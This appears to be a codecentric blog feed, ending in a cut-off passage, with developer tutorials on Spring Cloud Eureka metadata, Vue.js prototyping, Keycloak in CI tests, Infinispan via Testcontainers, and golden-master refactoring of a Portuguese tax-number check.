Each of the six facets shows the explanation for the prediction of an individual patient or instance. The header of each facet gives the case number (here the patient ID), which class label was predicted and with what probability. For example, the top left instance describes case number 4 which was classified as “ckd” with 98 % probability. Below the header we find a bar-plot for the top 8 most important features; the length of each bar shows the weight of the feature, positive weights support a prediction, negative weights contradict it. Again described for the top left instance: the bar-plot shows that the hemoglobin value was between 0.388 and 0.466, which supports the classification as “ckd”; packed cell volume (pcv), serum creatinine (sc), etc. similarly support the classification as “ckd” (for a full list of feature abbreviations, see http://archive.ics.uci.edu/ml/datasets/Chronic_Kidney_Disease). This patient’s age and white blood cell count (wbcc), on the other hand, are more characteristic of a healthy person and therefore contradict the classification as “ckd”.

Links and additional resources

This article is also available in German: https://blog.codecentric.de/2018/01/vertrauen-und-vorurteile-maschinellem-lernen/

  1. Marco Tulio Ribeiro, Sameer Singh, and Carlos Guestrin. 2016. “Why Should I Trust You?”: Explaining the Predictions of Any Classifier. In Proceedings of the 22nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (KDD ’16). ACM, New York, NY, USA, 1135-1144. DOI: https://doi.org/10.1145/2939672.2939778
  2. Edwards, Lilian and Veale, Michael, Slave to the Algorithm? Why a ‘Right to an Explanation’ Is Probably Not the Remedy You Are Looking For (May 23, 2017). 16 Duke Law & Technology Review 18 (2017). Available at SSRN: https://ssrn.com/abstract=2972855
  3. http://www.insidertradings.org/2017/12/18/machine-learning-as-a-service-market-research-report-2017-to-2022/
  4. http://mitsloan.mit.edu/newsroom/press-releases/mit-sloan-professor-uses-machine-learning-to-design-crime-prediction-models/ and https://www.nytimes.com/2017/05/01/us/politics/sent-to-prison-by-a-software-programs-secret-algorithms.html
  5. https://www.bloomberg.com/news/articles/2017-12-04/researchers-combat-gender-and-racial-bias-in-artificial-intelligence
  6. https://www.engadget.com/2017/12/21/algorithmic-bias-in-2018/
  7. http://archive.ics.uci.edu/ml/datasets/Chronic_Kidney_Disease

The post Looking beyond accuracy to improve trust in machine learning appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Spring Cloud Service Discovery with Dynamic Metadata

codecentric Blog - Sun, 07-Jan-18 23:00

Spring Cloud Service Discovery

If you are running applications consisting of a lot of microservices depending on each other, you are probably using some kind of service registry. Spring Cloud offers a set of starters for interacting with the most common service registries.

For the rest of this article, let’s assume you are familiar with the core Spring Boot ecosystem.

In our example we will use the service registry Eureka from Netflix running on localhost:8761. We will run two services service-1 on port 8080 and service-2 on port 8081 both implemented with Spring Boot. In order to register itself and look up others services, each service includes the following starter as a build dependency:


  
    
      org.springframework.cloud
      spring-cloud-dependencies
      Dalston.SR4
      pom
      import
    
  

...

  org.springframework.cloud
  spring-cloud-starter-eureka

Each service has to configure its unique name and where the Eureka server is located. We will use the YAML format in src/resources/application.yml:

spring:
  application:
    name: service-1

eureka:
  client:
    serviceUrl:
      defaultZone: http://localhost:8761/eureka

The configuration of service-2 will look similar.

Service Discovery

The implementation of service-2 contains a simple REST controller to access the service registry:

@RestController
public class RegistryLookup {

   @Autowired
   private DiscoveryClient discoveryClient;

   @RequestMapping("/lookup/{serviceId}")
   public List lookup(@PathVariable String serviceId) {
      return discoveryClient.getInstances(serviceId);
   }

}

Spring Cloud Service Discovery

In order to use the DiscoveryClient API, you have to use the annotation @EnableDiscoveryClient somewhere within your configuration classes.

A lookup of service-1 …

http://localhost:8081/lookup/service-1

… yields a lot of information on that service:

{
    "host": "SOME.IP.ADDRESS",
    "port": 8080,
    "secure": false,
    "instanceInfo": {
        "instanceId": "SOME.IP.ADDRESS:service-1:8080",
        "app": "SERVICE-1",
        ...

This information is used by REST clients like Feign to discover the HTTP endpoint of services by symbolic names like service-1.

Static Service Metadata

Each service can define arbitrary metadata within its configuration. With Eureka, this metadata can be a map of values defined in application.yml:

eureka:
  instance:
    metadata-map:
      fixed-s1: "value_1"

This metadata can be used by clients for various use cases. A service can describe SLAs, quality of data or whatever you want. But this metadata is fixed in a sense that is has to be known at build or deployment time. The latter is the case when you overwrite your Spring environment with JVM or OS environment variables. Anyway, the metadata show up within the lookup http://localhost:8081/lookup/service-1:

{
    "host": "localhost",
    "port": 8080,
    "uri": "http://localhost:8080",
    "metadata": {
        "fixed-s1": "value_1"
    },
    "secure": false,
    "serviceId": "SERVICE-1",
    ...
}

Dynamic Service Metadata

If a service wants to detect and register its metadata at runtime, you have to use the client API of the service registry in use. With the Eureka client this may look like this:

@Component
public class DynamicMetadataReporter {

   @Autowired
   private ApplicationInfoManager aim;

   @PostConstruct
   public void init() {
      Map map = aim.getInfo().getMetadata();
      map.put("dynamic-s1", "value_2");
   }
}

The class ApplicationInfoManager is from the Eureka client API and allows you to dynamically add metadata that shows up if we query the service registry for service-1:

{
    "host": "localhost",
    "port": 8080,
    "uri": "http://localhost:8080",
    "metadata": {
        "dynamic-s1": "value_2",  // dynamic metadata
        "fixed-s1": "value_1"
    },
    "secure": false,
    "serviceId": "SERVICE-1",
    ...
}

The post Spring Cloud Service Discovery with Dynamic Metadata appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Rapid prototyping with Vue.js

codecentric Blog - Thu, 04-Jan-18 23:57

When I started at codecentric, I had no clue about frontend frameworks. Sure, I knew my HTML and CSS and I did some dynamic pages with PHP, but who didn’t? The first frontend-only framework I seriously worked with was AngularJS. I had a hard time getting into it, which was mostly based on the fact that it was ill-used in our project setup. Instead of separate modules for different parts of the software, we had one giant controller that only got more and more code branches for all the little specialities that were necessary for our business cases.

After a while, our team broke up this massive pile of code. I was eager to help and got a better understanding of JavaScript and AngularJS every day. Today I am pretty familiar with AngularJS projects. Although there is one thing that’s always bothered me. Setting up a small Angular project, for example if you want to quickly try out an idea, can be pretty tedious.
I took a look at other frameworks (Angular2, React) in hope that they would be more easy to start a project with, but there you mostly start with an npm/webpack/whatever setup, which is often just totally overweight.

Then I came across Vue. And I really like how lightweight it can be. In this tutorial, I want to show you how quickly you can set up a dynamic webpage, even with REST functionality. A little bit of basic JavaScript knowledge is helpful here. You should also be familiar with the usage of your browser’s developer tools.

If you want to program along, create an index.html and paste this snippet. In the snippet I added some css styling, so the whole thing looks a little bit nicer.

Let’s start with a simple form:


  
    Zip:
    
    
  


  City
  Matching City:
  Insert zip to display matching city

This should render you the following form:

Rendered form

The form should take a valid (in this case German) ZIP and show the matching city.
Now let’s init Vue.js. Add a link to vue.js to the header:


   

Then add a script snippet before the closing html tag where you init Vue:


    new Vue({
        el: '#zip-loader',
        data: {
            city: 'Insert zip to display matching city'
        }
    });

We don’t have an Element ‘#zip-loader’ yet, so create a div around the existing form:

Replace the text ‘Insert zip to display matching city’ with {{ city }}, so that it looks like this:

Matching City: {{ city }}

Reload the file. It should look the same. Only the text is now taken out of the data part of the Vue instance we created. Try changing the text in the city field. It should change in your form. If something’s wrong, check your browser console for errors. Vue is very verbose and it’s often easy to spot the mistakes.

Let’s register the user’s input. Add a ZIP field to the data section of your vue instance and set it to be an empty string:

data: {
  zip: '',
  ..
}

Bind the new field to the input field in the form. Now everything the users enter here will be directly bound to the ZIP field in the data section of our Vue instance.

  

Now let’s add a method that is called when a letter is entered:

  

Add a methods block in your Vue instance and define the method ‘parseZip’ in it. Let’s just log the value of the ZIP field.

  methods:{ 
    parseZip: function(){
    console.log(this.zip);
  }
}

Now if you enter something in the input field, your browser should log it to the console. By the way, this references your Vue instance.

Now that we get user input, we need to do something with it. We want to load a matching city for an entered ZIP. Since we don’t have a backend, we use a public API for this. http://api.zippopotam.us/ offers a very easy to use API. If you call http://api.zippopotam.us/de/42697 (the ZIP of the city Solingen in Germany), you get a nice JSON object that holds all the necessary information:

{
  "post code": "42697",
  "country": "Germany",
  "country abbreviation": "DE",
  "places": [{
    "place name": "Solingen",
    "longitude": "51.1611",
    "state": "Nordrhein-Westfalen",
    "state abbreviation": "NW",
    "latitude": "05122"
  }]
}

Vue cannot make REST calls. So we need another library for this. I use axios, but you can use any REST library you like. To embed it, just add the JavaScript source to the header:


      

This enables you to make a GET call in the parseZip method:

parseZip: function(){
  axios.get('http://api.zippopotam.us/de/42697')
  .then(function(response){
  console.log(response.data);
  })
}

Instead of logging the content of the ZIP field, we now make a REST call every time the user enters a key. The resulting data is then logged to the browser console.

Now modify the REST URL to take the ZIP from the data object of our Vue instance:

  axios.get(`http://api.zippopotam.us/de/${this.zip}`)

Note that I changed the single quotes to backticks here, so I can use template strings.

Since ZIP codes in Germany are generally 5 digits long, add a safeguard around the method, so that the API is not called with a definitely invalid ZIP. Also, change the log function to log the retrieved city. Take a look at the JSON object again, to better understand the syntax I used here.

if (this.zip.length === 5) {
  axios.get(`http://api.zippopotam.us/de/${this.zip}`).then(function(response) {
  console.log(response.data.places[0]['place name']);
  })
}

To show the retrieved city on the website, just assign it to the data object. Note: We need to assign the Vue instance to a variable first, because the callback function of the REST call creates a new scope where this doesn’t reference the Vue instance any more.

const myApp = this;
if (this.zip.length === 5) {
  axios.get(`http://api.zippopotam.us/de/${this.zip}`)
  .then(function (response) {
  myApp.city = response.data.places[0]['place name'];
  })
}

If you now enter a valid ZIP into the input form, it should show the name of the matching city.

Now our basic functionality is done. Let’s finish up with a little error handling and a loading message.

To show an error message, add a catch block to the get method.

axios.get(`http://api.zippopotam.us/de/${this.zip}`)
.then(function (response) {
  myApp.city = response.data.places[0]['place name'];
})
.catch(function(){
  myApp.city = 'Not a valid zip code';
})

To show a loading message, we need a little additional CSS:


…
.visible {
  display: inline;
}
…

Add a loading flag to the data section:

data: {
           …
            loading: false
        }

Set the flag to true before the GET call:

…
myApp.loading = true; 
axios.get(`http://api.zippopotam.us/de/${this.zip}`)
…

And set it to false when loading is done:

.then(function (response) {
  myApp.city = response.data.places[0]['place name'];
  myApp.loading = false;
})
.catch(function () {
  myApp.city = 'Not a valid zip code';
  myApp.loading = false;
})

Now all there is left is changing the CSS class of the Loading... text according to the flag.

Loading...

That’s it. We’re done. We created a dynamic, RESTful web page without any build or packaging tools. This shows why Vue is a great framework if you want to try out something very quick.

You can look up the final code at https://github.com/Guysbert/vue-rapid-protoyping or play with it in this codepen.

See the Pen Rapid protoyping with vue by Andreas Houben (@ahouben) on CodePen.

The post Rapid prototyping with Vue.js appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Continuous Validation for Security Configurations

codecentric Blog - Thu, 04-Jan-18 02:00

Testing integration with a component that has a completely separate life cycle apart from your application is hard. Think about a database system version upgrade. In more cases than one, it has caused a decision to skip automation entirely and rely on manual testing instead. An IAM solution is just like that. It’s configuration-heavy and it is often managed outside of the scope of your team. However, end-to-end testing definitely forces us to consider how we functionally test our security.

Last year, Keycloak became popular (marked assess by TechRadar) as an open source IAM solution and it offers a wide range of APIs. My colleagues already wrote some nice articles. I wanted to explore the opportunities of using Keycloak for our CI to improve testability in our IAM integration.

With Keycloak you are able to continuously test IAM integration in your E2E test suite.

Recently I discovered Keycloak as an Identity and Access Management (IAM) candidate for our Gareth.io platform and another product which is still in incubation. So far, I am pleased with what I have found. The ease of integration via its endpoints is what makes it an especially interesting candidate. Additionally I found a good opportunity to use Keycloak as an E2E test candidate.

Keycloak is developed and promoted by Red Hat. The project pages are located at http://keycloak.jboss.org, the sources can be found in GitHub. The product is completely written in Java and extensively uses Red Hat’s Java Stack. WildFly is used as the default application server and Wildfly’s clustering and high availability functions are also used. Read a nice introduction from my colleague here.

Step 1. Additions to the infrastructure

There are a number of options to configure Keycloak. There is an administrative UI, a config file (keycloak.xml), a CLI, and everything is configurable using the REST interface. All applications living in the same logical domain are in the same Realm. A realm contains the functional administration options (eg. allowed roles, user profile fields, authentication providers, etc.).

To make it testable, I used the jboss/keycloak Docker image to get a basic running Keycloak instance. I have a CI job that creates a basic Keycloak, specific to my project. I use it to configure my realm and roles. It has its own lifecycle and is managed by a separate pipeline. There is a base image which contains basic Keycloak realm configuration. Based on my Keycloak base image I build my production Keycloak (with enriched configuration) and multiple configuration variants for testing Keycloak in my CI pipeline.  

Step 2. Add Keycloak to the test project

Next, we need to add a Keycloak client to our test infrastructure. I use Cucumber (Java variant) to drive my acceptance tests. I added the official Keycloak client jar  and RESTEasy libraries.

In order to connect to it, you can initiate an instance of the client like this:

Keycloak integration code example

 

 

 

 

 


Now let’s influence Keycloak with our newly bootstrapped library. We first define a Cucumber step and then create an implementation:

Cucumber test

 

And the corresponding Java implementation for our step. We will create a new user within the realm of the tested application and assign it an administrator role. Because we instantly want to use this user in our test we need to mark it as enable.

Cucumber test

 

Now this is just one example of things you can do in your CI with keycloak. I personally am not the biggest fan of testing too many non-functionals in your E2E tests. Functionally you can thoroughly test your registration and sign-in functionality. This is probably not where the main business value is delivered, but it is the start of the user experience in many applications. So we should make sure to capture regression in an early stage of delivery. Furthermore, there are some really nice non-functional cases that used to be hard or required a lot of manual testing which is now possible automagically.

Server side session invalidation

In a modern web application security tokens can be distributed across apps, single-page application frontends and backend applications. Testing this is cumbersome and intrinsically complicated. With the Keycloak client you are now able to influence one or more realms. A very nice feature is ‘RealmResource.logoutAll()’ which invalidates all running sessions on the server. Afterwards you can verify that clients behave accordingly. But there are plenty more.

Wrapping up

We have seen an example on how to integrate Keycloak in your acceptance testing suite. Because we use Docker it’s easily integrated in popular CI tools like Gitlab, Jenkins or CircleCI. Based on what I have seen so far, everything you can do in the Keycloak administrative interface is administrable over REST. Next to this interface there is also the possibility to use shell scripts for administrative purposes. For ultimate flexibility Keycloak is easily and quickly booted in a container so one could even swap out security providers.

My final advice is to keep your Cucumber steps generic. Once created they can be reused  across multiple projects and teams.

 

Handy sources and follow-up work

Keycloak website: https://www.thoughtworks.com/radar/platforms/keycloak

Dieter Dirkes’ introduction: https://blog.codecentric.de/2016/06/accessmanagement-mit-keycloak/

Jannik Hüls: https://blog.codecentric.de/2016/08/single-sign-mit-keycloak-als-openid-connect-provider/

 

The post Continuous Validation for Security Configurations appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Running an Infinispan server using Testcontainers

codecentric Blog - Mon, 18-Dec-17 23:00

Recently I discovered a library called Testcontainers. I already wrote about using it on my current project here. It helps you run software that your application depends on in a test context by providing an API to start docker containers. It’s implemented as a JUnit 4 rule currently, but you can also use it manually with JUnit 5. Native support for JUnit 5 is on the roadmap for the next major release. Testcontainers comes with a few pre-configured database- and selenium-containers, but most importantly it also provides a generic container that you can use to start whatever docker image you need to.

In my project we are using Infinispan for distributed caching. For some of our integration tests caching is disabled, but others rely on a running Infinispan instance. Up until now we have been using a virtual machine to run Infinispan and other software on developer machines and build servers. The way we are handling this poses a few problems and isolated Infinispan instances would help mitigate these. This post shows how you can get Infinispan running in a generic container. I’ll also try to come up with a useful abstraction that makes running Infinispan as a test container easier.

Configuring a generic container for Infinispan

Docker Hub provides a readymade Infinispan image: jboss/infinispan-server. We’ll be using the latest version at this time, which is 9.1.3.Final. Our first attempt to start the server using Testcontainers looks like this:

@ClassRule
public static GenericContainer infinispan =
      new GenericContainer("jboss/infinispan-server:9.1.3.Final");

@Before
public void setup(){
    cacheManager = new RemoteCacheManager(new ConfigurationBuilder()
            .addServers(getServerAddress())
            .version(ProtocolVersion.PROTOCOL_VERSION_26)
            .build());
}
  
@Test
public void should_be_able_to_retrieve_a_cache() {
    assertNotNull(cacheManager.getCache());
}

private String getServerAddress() {
    return infinispan.getContainerIpAddress() + ":" 
        + infinispan.getMappedPort(11222);
}

You can see a few things here:

  1. We’re configuring our test class with a class rule that will start a generic container. As a parameter, we use the name of the infinispan docker image alongside the required version. You could also use latest here.
  2. There’s a setup method that creates a RemoteCacheManager to connect to the Infinispan server running inside the docker container. We extract the network address from the generic container and retrieve the container IP address and the mapped port number for the hotrod port in getServerAddress()
  3. Then there’s a simple test that will make sure we are able to retrieve an unnamed cache from the server.

Waiting for Infinispan

If we run the test, it doesn’t work and throws a TransportException, though. It mentions an error code that hints at a connection problem. Looking at other pre-configured containers, we see that they have some kind of waiting strategy in place. This is important so that the test only starts after the container has fully loaded. The PostgreSQLContainer waits for a log message, for example. There’s other wait strategies available and you can implement your own, as well. One of the default strategies is the HostPortWaitStrategy and it seems like a straightforward choice. With the Infinispan image at least, it doesn’t work though: one of the commands that is used to determine the readiness of the tcp port has a subtle bug in it and the other relies on the netcat command line tool being present in the docker image. We’ll stick to the same approach as the PostgreSQLContainer rule and check for a suitable log message to appear on the container’s output. We can determine a message by manually starting the docker container on the command line using:

docker run -it jboss/infinispan-server:9.1.3.Final.

The configuration of our rule then changes to this:

@ClassRule
public static GenericContainer container =
    new GenericContainer("jboss/infinispan-server:9.1.3.Final")
      .waitingFor(new LogMessageWaitStrategy()
         .withRegEx(".*Infinispan Server.*started in.*\\s"));

After this change, the test still doesn’t work correctly. But at least it behaves differently: It waits for a considerable amount of time and again throws a TransportException before the test finishes. Since the underlying TcpTransportFactory swallows exceptions on startup and returns a cache object anyway, the test will still be green. Let’s address this first. I don’t see a way to ask the RemoteCacheManager or the RemoteCache about the state of the connection, so my approach here is to work with a timeout:

private ExecutorService executorService = Executors.newCachedThreadPool();

@Test
public void should_be_able_to_retrieve_a_cache() throws Exception {
    Future> result = 
             executorService.submit(() -> cacheManager.getCache());
    assertNotNull(result.get(1500, TimeUnit.MILLISECONDS));
}

The test will now fail should we not be able to retrieve the cache within 1500 milliseconds. Unfortunatly, the resulting TimeoutException will not be linked to the TransportException, though. I’ll take suggestions for how to better write a failing test and leave it at that, for the time being.

Running Infinispan in standalone mode

Looking at the stacktrace of the TransportException we see the following output:

INFO: ISPN004006: localhost:33086 sent new topology view (id=1, age=0) containing 1 addresses: [172.17.0.2:11222]
Dez 14, 2017 19:57:43 AM org.infinispan.client.hotrod.impl.transport.tcp.TcpTransportFactory updateTopologyInfo
INFO: ISPN004014: New server added(172.17.0.2:11222), adding to the pool.

It looks like the server is running in clustered mode and the client gets a new server address to talk to. The IP address and port number seem correct, but looking more closely we notice that the hotrod port 11222 refers to a port number inside the docker container. It is not reachable from the host. That’s why Testcontainers gives you the ability to easily retrieve port mappings. We already use this in our getServerAddress() method. Infinispan, or rather the hotrod protocol, however is not aware of the docker environment and communicates the internal port to the cluster clients overwriting our initial configurtation.

To confirm this analysis we can have a look at the output of the server when we start the image manually:

19:12:47,368 INFO [org.infinispan.remoting.transport.jgroups.JGroupsTransport] (MSC service thread 1-6) ISPN000078: Starting JGroups channel clustered
19:12:47,371 INFO [org.infinispan.CLUSTER] (MSC service thread 1-6) ISPN000094: Received new cluster view for channel cluster: [9621833c0138|0] (1) [9621833c0138]
...
Dez 14, 2017 19:12:47,376 AM org.infinispan.client.hotrod.impl.transport.tcp.TcpTransportFactory updateTopologyInfo
INFO: ISPN004016: Server not in cluster anymore(localhost:33167), removing from the pool.

The server is indeed starting in clustered mode and the documentation on Docker Hub also confirms this. For our tests we need a standalone server though. On the command line we can add a parameter when starting the container (again, we get this from the documentation on Docker Hub):

$ docker run -it jboss/infinispan-server:9.1.3.Final standalone

The output now tells us that Infinispan is no longer running in clustered mode. In order to start Infinispan as a standalone server using Testcontainers, we need to add a command to the container startup. Once more we change the configuration of the container rule:

@ClassRule
public static GenericContainer container =
    new GenericContainer("jboss/infinispan-server:9.1.3.Final")
      .waitingFor(new LogMessageWaitStrategy()
         .withRegEx(".*Infinispan Server.*started in.*\\s"))
      .withCommand("standalone");

Now our test now has access to an Infinispan instance running in a container.

Adding a specific configuration

The applications in our project use different caches, these can be configured in the Infinispan standalone configuration file. For our tests, we need them to be present. One solution is to use the .withClasspathResourceMapping() method to link a configuration file from the (test-)classpath into the container. This configuration file contains the cache configurations. Knowing the location of the configuration file in the container, we can once again change the testcontainer configuration:

public static GenericContainer container =
    new GenericContainer("jboss/infinispan-server:9.1.3.Final")
      .waitingFor(new LogMessageWaitStrategy()
         .withRegEx(".*Infinispan Server.*started in.*\\s"))
      .withCommand("standalone")
      .withClasspathResourceMapping(
              "infinispan-standalone.xml",
              "/opt/jboss/infinispan-server/standalone/configuration/standalone.xml",
              BindMode.READ_ONLY);

@Test
public void should_be_able_to_retrieve_a_cache() throws Exception {
    Future> result = 
         executorService.submit(() -> cacheManager.getCache("testCache"));
    assertNotNull(result.get(1500, TimeUnit.MILLISECONDS));
}

Now we can retrieve and work with a cache from the Infinispan instance in the container.

Simplifying the configuration

You can see how it can be a bit of a pain getting an arbitrary docker image to run correctly using a generic container. For Infinispan we now know what we need to configure. But I really don’t want to think of all this every time I need an Infinispan server for a test. However, we can create our own abstraction similar to the PostgreSQLContainer. It contains the configuration bits that we discovered in the first part of this post and since it is an implementation of a GenericContainer, we can also use everything that’s provided by the latter.

public class InfinispanContainer extends GenericContainer {

  private static final String IMAGE_NAME = "jboss/infinispan-server";

  public InfinispanContainer() {
    this(IMAGE_NAME + ":latest");
  }

  public InfinispanContainer(final String imageName) {
    super(imageName);
    withStartupTimeout(Duration.ofMillis(20000));
    withCommand("standalone");
    waitingFor(new LogMessageWaitStrategy().withRegEx(".*Infinispan Server.*started in.*\\s"));
  }

}

In our tests we can now create an Infinispan container like this:

@ClassRule
public static InfinispanContainer infinispan = new InfinispanContainer();

That’s a lot better than dealing with a generic container.

Adding easy cache configuration

You may have noticed that I left out the custom configuration part here. We can do better by providing builder methods to create caches programatically using the RemoteCacheManager. Creating a cache is as easy as this:

cacheManager.administration().createCache("someCache", null);

In order to let the container automatically create caches we facilitate the callback method containerIsStarted(). We can overload it in our abstraction, create a RemoteCacheManager and use its API to create caches that we configure upfront:

...
private RemoteCacheManager cacheManager;
private Collection cacheNames;
...

public InfinispanContainer withCaches(final Collection cacheNames) {
    this.cacheNames = cacheNames;
    return this;
}

@Override
protected void containerIsStarted(final InspectContainerResponse containerInfo) {
    cacheManager = new RemoteCacheManager(new ConfigurationBuilder()
        .addServers(getServerAddress())
        .version(getProtocolVersion())
        .build());

    this.cacheNames.forEach(cacheName -> 
        cacheManager.administration().createCache(cacheName, null));
}

public RemoteCacheManager getCacheManager() {
    return cacheManager;
}

You can also retrieve the CacheManager from the container and use it in your tests.
There’s also a problem with this approach: you can only create caches through the API if you use Hotrod protocol version 2.0 or above. I’m willing to accept that as it makes the usage in test really comfortable:

@ClassRule
public static InfinispanContainer infinispan =
      new InfinispanContainer()
          .withProtocolVersion(ProtocolVersion.PROTOCOL_VERSION_21)
          .withCaches("testCache");

@Test
public void should_get_existing_cache() {
    assertNotNull(infinispan.getCacheManager().getCache("testCache"));
}

If you need to work with a protocol version below 2.0, you can still use the approach from above, linking a configuration file into the container.

Conclusion

While it sounds very easy to run any docker image using Testcontainers, there’s a lot of configuration details to know, depending on the complexity of the software that you need to run. In order to effectivly work with such a container, it’s a good idea to encapsulate this in your own specific container. Ideally, these containers will end up in the Testcontainers repository and others can benefit of your work as well.
I hope this will be useful for others, if you want to see the full code, have a look at this repository.

The post Running an Infinispan server using Testcontainers appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Refactoring Algorithmic Code using a Golden Master Record

codecentric Blog - Sun, 17-Dec-17 23:00

Introduction

There are days when I find a piece of code I simply have to refactor. Sometimes because I actually have to for project-related reasons, sometimes because it’s easy to, and sometimes because I just want to. One definition of a nice day is when all these reasons meet.

Enter the Portuguese tax number verification.

For those who don’t know, in most countries the tax number has one or more check digits which are calculated according to some algorithm the country’s legislators think is up for the task. If you have a frontend where customers enter tax numbers, it’s a good first step to actually check the validity of the number according to the check digit in order to provide fast feedback to the user.

Usually I don’t do the research on the algorithms we implement for this myself. Someone else on my team calls someone from the country in the same organization and we code monkeys usually get code snippets, such as this one. In this case I got curious. The portuguese wiki contains a nice explanation of the check digit algorithm, which is a variation of an algorithm called (according to google) the modulus 11 check digit algorithm.

  • Implementing this from scratch probably would have been straightforward, but I decided to refactor for several reasons:
    Sometimes web sources can be wrong. Take, for example, this community wiki: Here they seem to have forgotten about a part of the algorithm. If this had been my first source, I’d have had a bug report. Thus I usually try to stay near the scripts my customers provide me with.
  • Refactoring this very isolated piece of code would be easy.
  • Sometimes the scripts we get from our colleagues contain a little bit of extra logic which make sense in the context where we use them. In this one, for example, I was told to “just don’t worry about the extra cases at the beginning. We are not interested in these and it’s okay to delete them.”

Side note: For the purposes of this exercise, I used ES6 transpiled with Babel. For my tests, I use mocha and chai.

Enough introduction! Let’s have a look at:

The Code

I admit I did a tiny bit of untested refactoring first: Returning true or false instead of an alert, exporting the function and deleting the, as per our definition unnecessary, lines.

export function validaContribuinte(contribuinte) {
// algoritmo de validação do NIF de acordo com
// http://pt.wikipedia.org/wiki/N%C3%BAmero_de_identifica%C3%A7%C3%A3o_fiscal
    let comparador;
    var temErro = 0;

    var check1 = contribuinte.substr(0, 1) * 9;
    var check2 = contribuinte.substr(1, 1) * 8;
    var check3 = contribuinte.substr(2, 1) * 7;
    var check4 = contribuinte.substr(3, 1) * 6;
    var check5 = contribuinte.substr(4, 1) * 5;
    var check6 = contribuinte.substr(5, 1) * 4;
    var check7 = contribuinte.substr(6, 1) * 3;
    var check8 = contribuinte.substr(7, 1) * 2;

    var total = check1 + check2 + check3 + check4 + check5 + check6 + check7 + check8;
    var divisao = total / 11;
    var modulo11 = total - parseInt(divisao) * 11;
    if (modulo11 == 1 || modulo11 == 0) {
        comparador = 0;
    } // excepção
    else {
        comparador = 11 - modulo11;
    }

    var ultimoDigito = contribuinte.substr(8, 1) * 1;
    if (ultimoDigito != comparador) {
        temErro = 1;
    }

    if (temErro == 1) {
        return false;
    }
    return true;
}

Where to start

The first thing you want to do when you refactor code is have unit tests for the code. Since most code to refactor is hard to understand, a lot of people prefer to not even try and rather create a Golden Master test. A detailed explanation as well as a walkthrough in Java can be found here.

Creating a Golden Master

So the steps to creating a Golden Master test are:

  1.  Create a number of random inputs for your testee
  2. Use these inputs to generate a number of outputs
  3. Record the inputs and outputs.

Why are we doing this?

If the number of random inputs is high enough, it’s very probable that we have all test cases in there somewhere. If we capture the state of the testee before we start changing anything, we can be sure we won’t break anything later.

There’s one thing I want to say now: A Golden Master record should in most cases be only a temporary solution. You do not really want files or databases full of randomly generated crap to clog your server, and you don’t want long-running tests with way too many redundant test cases on your CI server.

Step 1: Create A Number Of Random Inputs

For this, we have to actually look at the code to be refactored. A quick glance says: “This function takes strings of length 9 which contain only digits as valid input”.

My first instinct was to try and calculate all of them. After a few frustrating minutes which I spent discussing with my computer’s memory, I did a small back-of-an-envelope calculation (16 Bit x 9 x 899999999 > 15 TB). So this turned out to be a Bad Idea™.

The next best thing was to create some random numbers between 100000000 and 99999999. After a bit of experimentation, because I “have no idea of the algorithm” for the purpose of this exercise, I settled on 10000 random fake tax numbers, which corresponded to three seconds overall test runtime on my machine. The code to generate these is wrapped in a testcase for easy access (remember, this is temporary):

describe('validatePortugueseTaxNumber', () => {
    describe('goldenMaster', () => {
        it('should generate a golden master', () => {
            const gen = random.create('My super Golden Master seed'),
                expectedResultsAndInputs = [ ...new Array(1000000) ].map(() => {
                    const input = gen.intBetween(100000000, 999999999),
                        ...
                });
        }).timeout(10000);
    });
});

Side note: It is often recommended to use a seedable random generator. Since at that point I was not sure whether I wanted to actually save the inputs or not, I ended up using this PRNG. It’s not strictly necessary for this exercise, though.

Step 2: Use These Inputs To Generate A Number Of Outputs.

Just call the function.

...
    const input = gen.intBetween(100000000, 999999999),
        result = validaContribuinte(input.toString(10));

        return { input, result };
...

Step 3: Record The Inputs And Outputs

This also was pretty straightforward. I used the built-in mechanisms of node.js to write the output to a ~3.5MB file.

fs.writeFileSync('goldenMaster.json', JSON.stringify(expectedResultsAndInputs));

And just like that, a Golden Master was created.

Create a test based on the Golden Master

The next step is to use the Golden Master in a test case. For each input, the corresponding output has to correlate to the file.
My test looks like this:

it('should always conform to golden master test', () => {
    const buffer = fs.readFileSync('goldenMaster.json'),
    data = JSON.parse(buffer);

    data.map(({ input, result }) => {
        return expect(validaContribuinte(nextNumber.toString(10))).to.equal(result);
    });
}).timeout(10000);

Side note: I stopped running the Golden Master generation every time; even though it would never produce different results unless the seed changed, it would’ve been a waste of resources to run every time.

I ran this a couple of times just for the heck of it. Then I started playing around with the code under test, deleting a line here, changing a number there, until I was confident that my Golden Master was sufficiently capturing all the cases. I encourage you to do this, it’s one of the very few times that you get to be happy about red tests.

golden master record

I was not really satisfied with the output yet. “expected false to equal true” in which case, exactly? Again, in this simple case it would probably not have been necessary, but sometimes it can be useful to also record the failing input. So, after some refactoring, this happened:

data.map(expectedResult => {
    const { input } = expectedResult;
    const result = validatePortugueseTaxNumber(input.toString(10));

    return expect({ input, result}).to.deep.equal(expectedResult);
    });
}).timeout(10000);

Refactoring

The refactoring itself was pretty straightforward. For the sake of brevity, most of the steps are skipped in this post.
Renaming the function and a few variables:

export function validatePortugueseTaxNumber(taxNumber) {
// algoritmo de validação do NIF de acordo com
// http://pt.wikipedia.org/wiki/N%C3%BAmero_de_identifica%C3%A7%C3%A3o_fiscal
    let comparator;
    let checkDigitWrong = 0;

    const check1 = taxNumber.substr(0, 1) * 9;
    const check2 = taxNumber.substr(1, 1) * 8;
    const check3 = taxNumber.substr(2, 1) * 7;
    const check4 = taxNumber.substr(3, 1) * 6;
    const check5 = taxNumber.substr(4, 1) * 5;
    const check6 = taxNumber.substr(5, 1) * 4;
    const check7 = taxNumber.substr(6, 1) * 3;
    const check8 = taxNumber.substr(7, 1) * 2;

    const total = check1 + check2 + check3 + check4 + check5 + check6 + check7 + check8;
    const divisao = total / 11;
    const modulo11 = total - parseInt(divisao) * 11;
    if (modulo11 == 1 || modulo11 == 0) {
        comparator = 0;
    }
    else {
        comparator = 11 - modulo11;
    }

    const ultimoDigito = taxNumber.substr(8, 1) * 1;
    if (ultimoDigito != comparator) {
        checkDigitWrong = 1;
    }

    if (checkDigitWrong == 1) {
        return false;
    }
    return true;
}

Simplifying (a lot):

export function validatePortugueseTaxNumber(taxNumber) {
